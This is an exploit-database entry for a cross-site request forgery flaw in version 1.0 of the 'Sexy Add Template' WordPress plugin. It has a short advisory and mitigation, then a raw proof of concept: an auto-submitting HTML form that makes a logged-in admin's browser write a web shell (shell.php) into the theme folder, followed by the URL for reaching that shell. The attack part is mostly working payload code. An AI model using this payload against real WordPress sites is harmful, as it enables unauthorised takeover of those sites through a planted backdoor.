header-logo
Suggest Exploit
vendor:
Sexy Add Template
by:
SecurityFocus
7,5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Sexy Add Template
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

WordPress Plugin Sexy Add Template – CSRF Upload Shell Vulnerability

The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

Mitigation:

The application should validate HTTP requests to prevent CSRF attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55666/info

The Sexy Add Template plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.

Sexy Add Template 1.0 is vulnerable; other versions may also be affected. 

#################################################################################
 #
 # [ Information Details ]
 # - Wordpress Plugin Sexy Add Template:
 # Attacker allow CSRF Upload Shell.
 # http://localhost/wp-admin/themes.php?page=AM-sexy-handle <--- Vuln CSRF, not require verification CODE "wpnonce".
 #
 # <html>
 # <head>
 # <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
 # <title>Wordpress Plugin Sexy Add Template - CSRF Upload Shell Vulnerability</title>
 # </head>
 # <body onload="document.form0.submit();">
 # <form method="POST" name="form0" action="http://localhost/wp-admin/themes.php?page=AM-sexy-handle" method="post" enctype="multipart/form-data" >
 # <input type="hidden" name="newfile" value="yes" /> 
 # <input type="hidden" type="text" value="shell.php" name="AM_filename">
 # <textarea type="hidden" name="AM_file_content">
 # [ Your Script Backdoor/Shell ]
 # &lt;/textarea&gt;
 # </form>
 # </body>
 # </html>
 #
 # - Access Shell:
 # http://www.example.com/wp-content/themes/[theme-name]/shell.php <--- HACKED...!!!
 #
 # +#################################################################################

Navigation

Suggest Exploit

Services By CQR